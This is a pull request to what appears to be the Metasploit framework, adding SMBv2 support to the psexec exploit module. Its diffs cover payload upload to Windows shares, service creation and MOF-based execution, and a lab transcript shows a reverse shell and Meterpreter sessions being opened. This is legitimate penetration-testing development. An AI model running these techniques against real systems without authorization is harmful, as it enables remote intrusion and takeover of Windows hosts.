### PR TITLE
psexec smb2 support

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -304,7 +304,7 @@ GEM
     rspec-support (3.7.1)
     ruby-macho (1.2.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (1.0.0)
+    ruby_smb (1.0.1)
       bindata
       rubyntlm
       windows_error

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -304,7 +304,7 @@ GEM
     rspec-support (3.7.1)
     ruby-macho (1.2.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (1.0.1)
+    ruby_smb (1.0.2)
       bindata
       rubyntlm
       windows_error

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -304,7 +304,7 @@ GEM
     rspec-support (3.7.1)
     ruby-macho (1.2.0)
     ruby-rc4 (0.1.5)
-    ruby_smb (0.0.24)
+    ruby_smb (1.0.0)
       bindata
       rubyntlm
       windows_error

--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@@ -220,6 +220,8 @@ module Msf
       def smb_file_exist?(file)
         begin
           fd = simple.open(file, 'o')
+        rescue RubySMB::Error::UnexpectedStatusCode => e
+          found = false
         rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
           # If attempting to open the file results in a "*_NOT_FOUND" error,
           # then we can be sure the file is not there.

--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@@ -166,8 +166,8 @@ module Msf
       #the default chunk size of 48000 for OpenFile is not compatible when signing is enabled (and with some nt4 implementations)
       #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED
       #fd.chunk_size = 500 is better
-      def smb_open(path, perm)
-        self.simple.open(path, perm, datastore['SMB::ChunkSize'])
+      def smb_open(path, perm, read: true, write: false)
+        self.simple.open(path, perm, datastore['SMB::ChunkSize'], read: read, write: write)
       end
 
       def smb_hostname

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -330,14 +330,14 @@ module Exploit::Remote::SMB::Client::Psexec
       if smb_share =~ /.[\\\/]/
         simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
         begin
-          simple.delete("\\#{fileprefix}\\#{filename}")
+          simple.delete("#{fileprefix}\\#{filename}")
         rescue XCEPT::ErrorCode => e
           print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
         end
       else
         simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
         begin
-          simple.delete("\\#{filename}")
+          simple.delete("#{filename}")
         rescue XCEPT::ErrorCode => e
           print_error("Delete of \\#{filename} failed: #{e.message}")
         end

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -142,54 +142,52 @@ module Exploit::Remote::SMB::Client::Psexec
     if svc_handle.nil?
       print_error("No service handle retrieved")
       return false
-    else
+    end
 
-      if service_description
-        vprint_status("Changing service description...")
-        svc_client.changeservicedescription(svc_handle, service_description)
+    if service_description
+      vprint_status("Changing service description...")
+      svc_client.changeservicedescription(svc_handle, service_description)
+    end
+
+    vprint_status("Starting the service...")
+    begin
+      svc_status = svc_client.startservice(svc_handle)
+      case svc_status
+      when ERROR_SUCCESS
+        print_good("Service started successfully...")
+      when ERROR_FILE_NOT_FOUND
+        print_error("Service failed to start - FILE_NOT_FOUND")
+      when ERROR_ACCESS_DENIED
+        print_error("Service failed to start - ACCESS_DENIED")
+      when ERROR_SERVICE_REQUEST_TIMEOUT
+        print_good("Service start timed out, OK if running a command or non-service executable...")
+      else
+        print_error("Service failed to start, ERROR_CODE: #{svc_status}")
       end
-
-      vprint_status("Starting the service...")
+    ensure
       begin
-        svc_status = svc_client.startservice(svc_handle)
-        case svc_status
-        when ERROR_SUCCESS
-          print_good("Service started successfully...")
-        when ERROR_FILE_NOT_FOUND
-          print_error("Service failed to start - FILE_NOT_FOUND")
-        when ERROR_ACCESS_DENIED
-          print_error("Service failed to start - ACCESS_DENIED")
-        when ERROR_SERVICE_REQUEST_TIMEOUT
-          print_good("Service start timed out, OK if running a command or non-service executable...")
+        # If service already exists don't delete it!
+        # Maybe we could have a force cleanup option..?
+        if service_exists
+          print_warning("Not removing service as it already existed...")
+        elsif datastore['SERVICE_PERSIST']
+          print_warning("Not removing service for persistence...")
         else
-          print_error("Service failed to start, ERROR_CODE: #{svc_status}")
+          vprint_status("Removing the service...")
+          svc_status = svc_client.deleteservice(svc_handle)
+          if svc_status == ERROR_SUCCESS
+            vprint_good("Successfully removed the service")
+          else
+            print_error("Unable to remove the service, ERROR_CODE: #{svc_status}")
+          end
         end
       ensure
-        begin
-          # If service already exists don't delete it!
-          # Maybe we could have a force cleanup option..?
-          if service_exists
-            print_warning("Not removing service as it already existed...")
-          elsif datastore['SERVICE_PERSIST']
-            print_warning("Not removing service for persistence...")
-          else
-            vprint_status("Removing the service...")
-            svc_status = svc_client.deleteservice(svc_handle)
-            if svc_status == ERROR_SUCCESS
-              vprint_good("Successfully removed the service")
-            else
-              print_error("Unable to remove the service, ERROR_CODE: #{svc_status}")
-            end
-          end
-        ensure
-          vprint_status("Closing service handle...")
-          svc_client.closehandle(svc_handle)
-        end
+        vprint_status("Closing service handle...")
+        svc_client.closehandle(svc_handle)
       end
     end
 
     if disconnect
-      sleep(1)
       simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
     end
 

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -272,11 +272,11 @@ module Exploit::Remote::SMB::Client::Psexec
   end
 
   def native_upload(smb_share)
-    filename = "#{rand_text_alpha(8)}.exe"
+    filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
     serviceencoder = ''
 
     # Upload the shellcode to a file
-    print_status("Uploading payload...")
+    print_status("Uploading payload... #{filename}")
     smbshare = smb_share
     fileprefix = ""
     # if SHARE = Users/sasha/ or something like this
@@ -347,7 +347,7 @@ module Exploit::Remote::SMB::Client::Psexec
 
   def mof_upload(smb_share)
     share = "\\\\#{datastore['RHOST']}\\ADMIN$"
-    filename = "#{rand_text_alpha(8)}.exe"
+    filename = "#{Rex::Text.rand_text_alpha(8)}.exe"
 
     # payload as exe
     print_status("Trying wbemexec...")
@@ -364,7 +364,7 @@ module Exploit::Remote::SMB::Client::Psexec
     print_status("Created %SystemRoot%\\system32\\#{filename}")
 
     # mof to cause execution of above
-    mofname = rand_text_alphanumeric(14) + ".MOF"
+    mofname = Rex::Text.rand_text_alphanumeric(14) + ".MOF"
     mof = generate_mof(mofname, filename)
     print_status("Uploading MOF...")
     fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -288,11 +288,11 @@ module Exploit::Remote::SMB::Client::Psexec
       smbshare = folder_list[0]
       fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
       simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+      fd = smb_open("#{fileprefix}\\#{filename}", 'rwct', write: true)
     else
       subfolder = false
       simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-      fd = smb_open("\\#{filename}", 'rwct')
+      fd = smb_open("#{filename}", 'rwct', write: true)
     end
     exe = ''
     opts = { :servicename => service_name, :serviceencoder => serviceencoder}
@@ -358,7 +358,7 @@ module Exploit::Remote::SMB::Client::Psexec
     end
     simple.connect(share)
     exe = generate_payload_exe
-    fd = smb_open("\\system32\\#{filename}", 'rwct')
+    fd = smb_open("\\system32\\#{filename}", 'rwct', write: true)
     fd << exe
     fd.close
     print_status("Created %SystemRoot%\\system32\\#{filename}")
@@ -367,7 +367,7 @@ module Exploit::Remote::SMB::Client::Psexec
     mofname = rand_text_alphanumeric(14) + ".MOF"
     mof = generate_mof(mofname, filename)
     print_status("Uploading MOF...")
-    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
+    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct', write: true)
     fd << mof
     fd.close
     print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")

--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@@ -260,8 +260,6 @@ require 'rex/proto/smb/exceptions'
 
     raw_response = ''
 
-    sleep 3
-
     begin
       raw_response = self.read()
     rescue ::EOFError
@@ -271,7 +269,6 @@ require 'rex/proto/smb/exceptions'
     if (raw_response == nil or raw_response.length == 0)
       raise Rex::Proto::DCERPC::Exceptions::NoResponse
     end
-
 
     self.last_response = Rex::Proto::DCERPC::Response.new(raw_response)
 

--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@@ -141,43 +141,7 @@ require 'rex/proto/smb/exceptions'
     # Are we reading from a remote pipe over SMB?
     if (self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe)
       begin
-
-        # Max SMB read is 65535, cap it at 64000
-        max_read = [64000, max_read].min
-        min_read = [64000, min_read].min
-
-        read_limit = nil
-
-        while(true)
-          # Random read offsets will not work on Windows NT 4.0 (thanks Dave!)
-
-          read_cnt = (rand(max_read-min_read)+min_read)
-          if(read_limit)
-            if(read_cnt + raw_response.length > read_limit)
-              read_cnt = raw_response.length - read_limit
-            end
-          end
-
-          data = self.socket.read(read_cnt, rand(1024)+1)
-          break if !(data and data.length > 0)
-          raw_response += data
-
-          # Keep reading until we have at least the DCERPC header
-          next if raw_response.length < 10
-
-          # We now have to process the raw_response and parse out the DCERPC fragment length
-          # if we have read enough data. Once we have the length value, we need to make sure
-          # that we don't read beyond this amount, or it can screw up the SMB state
-          if (not read_limit)
-            begin
-              check = Rex::Proto::DCERPC::Response.new(raw_response)
-              read_limit = check.frag_len
-            rescue ::Rex::Proto::DCERPC::Exceptions::InvalidPacket
-            end
-          end
-          break if (read_limit and read_limit <= raw_response.length)
-        end
-
+        raw_response = self.socket.read(65535, 0)
       rescue Rex::Proto::SMB::Exceptions::NoReply
         # I don't care if I didn't get a reply...
       rescue Rex::Proto::SMB::Exceptions::ErrorCode => exception

--- a/lib/rex/proto/dcerpc/client.rb
+++ b/lib/rex/proto/dcerpc/client.rb
@@ -296,6 +296,8 @@ require 'rex/proto/smb/exceptions'
 
     raw_response = ''
 
+    sleep 3
+
     begin
       raw_response = self.read()
     rescue ::EOFError

--- a/lib/rex/proto/smb/simpleclient.rb
+++ b/lib/rex/proto/smb/simpleclient.rb
@@ -214,7 +214,11 @@ attr_accessor :socket, :client, :direct, :shares, :last_share, :versions
   end
 
   def delete(*args)
-    self.client.delete(*args)
+    if self.versions.include?(2)
+      self.client.delete(args[0])
+    else
+      self.client.delete(*args)
+    end
   end
 
   def create_pipe(path, perm = 'c')

--- a/lib/rex/proto/smb/simpleclient/open_file.rb
+++ b/lib/rex/proto/smb/simpleclient/open_file.rb
@@ -47,7 +47,15 @@ module Rex::Proto::SMB
             fptr = data.length
           end
         else
-          data = client.read(file_id, offset, length).pack('C*')
+          begin
+            data = client.read(file_id, offset, length).pack('C*')
+          rescue RubySMB::Error::UnexpectedStatusCode => e
+            if e.message == 'STATUS_PIPE_EMPTY'
+              data = read_ruby_smb(length, offset)
+            else
+              raise e
+            end
+          end
         end
 
         data

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("Connecting to the server...")
-    connect()
+    connect(versions: [1,2])
 
     print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
     smb_login()

--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -13,7 +13,7 @@
             "SETTINGS": [
                 "SMBUser=vagrant",
                 "SMBPass=vagrant",
-                "TARGET=2"
+                "TARGET=0"
             ]
         }
     ],
@@ -42,7 +42,28 @@
             "CPE": "cpe:/o:microsoft:windows_7:::x64"
         },
         {
-            "CPE": "cpe:/o:microsoft:windows_10:::x64",
+            "CPE": "cpe:/o:microsoft:windows_10:::x64"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_8.1::sp1:x64"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_server_2008:r2:sp1:x64"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_7::sp1:x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_10:1607::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_8.1:::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
+        },
+        {
+            "CPE": "cpe:/o:microsoft:windows_server_2008::r2:x64",
             "TESTING_SNAPSHOT": "DisableSMBv1"
         }
     ],

--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -12,7 +12,8 @@
             "NAME": "exploit/windows/smb/psexec",
             "SETTINGS": [
                 "SMBUser=vagrant",
-                "SMBPass=vagrant"
+                "SMBPass=vagrant",
+                "TARGET=2"
             ]
         }
     ],
@@ -41,7 +42,8 @@
             "CPE": "cpe:/o:microsoft:windows_7:::x64"
         },
         {
-            "CPE": "cpe:/o:microsoft:windows_10:::x64"
+            "CPE": "cpe:/o:microsoft:windows_10:::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
         }
     ],
     "TARGET_GLOBALS": {


### PR DESCRIPTION
## Description
This PR updates the module exploit/windows/smb/psexec to support SMBv2 connection with RubySMB.
SMB1 tests:
- [x] Windows 7
- [x] Windows 10

SMB2 tests:
- [x] cpe:/o:microsoft:windows_10:::x64
- [x] cpe:/o:microsoft:windows_8.1::sp1:x64
- [x] cpe:/o:microsoft:windows_server_2008:r2:sp1:x64
- [x] cpe:/o:microsoft:windows_7::sp1:x64
- [x] cpe:/o:microsoft:windows_10:1607::x64
- [x] cpe:/o:microsoft:windows_8.1:::x64
- [x] cpe:/o:microsoft:windows_server_2008::r2:x64


## Verification

- [x] Setup a Windows 7 system
- [x] Edit registry HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters
- [x] SMB1 REG_DWORD with Data 0
- [x] SMB2 REG_DWORD with Data 1
- [x] Restart Windows 7
- [x] `./msfconsole`
- [x] `use exploit/windows/smb/psexec`
- [x] `set smbuser <user>`
- [x] `set smbpass <pass>`
- [x] `set target 1`
- [x] `set rhost <rhost>`
- [x] `run`
- [x] Get a session
- [x] `set target 2`
- [x] `run`
- [x] Get a session

```
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set target 1 
target => 1
msf5 exploit(windows/smb/psexec) > set smbuser IEUser
smbuser => IEUser
msf5 exploit(windows/smb/psexec) > set smbpass 'Passw0rd!'
smbpass => Passw0rd!
msf5 exploit(windows/smb/psexec) > set rhost 172.22.222.152
rhost => 172.22.222.152
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Executing the payload...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.152:49165) at 2018-06-18 14:07:23 -0500
[-] 172.22.222.152:445 - Exploit failed: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec::Failure
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.152 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Uploading payload...
[*] 172.22.222.152:445 - Created \yownzDcO.exe...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.152:49166) at 2018-06-18 14:08:08 -0500
[-] 172.22.222.152:445 - Exploit failed: RubySMB::Error::CommunicationError RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
```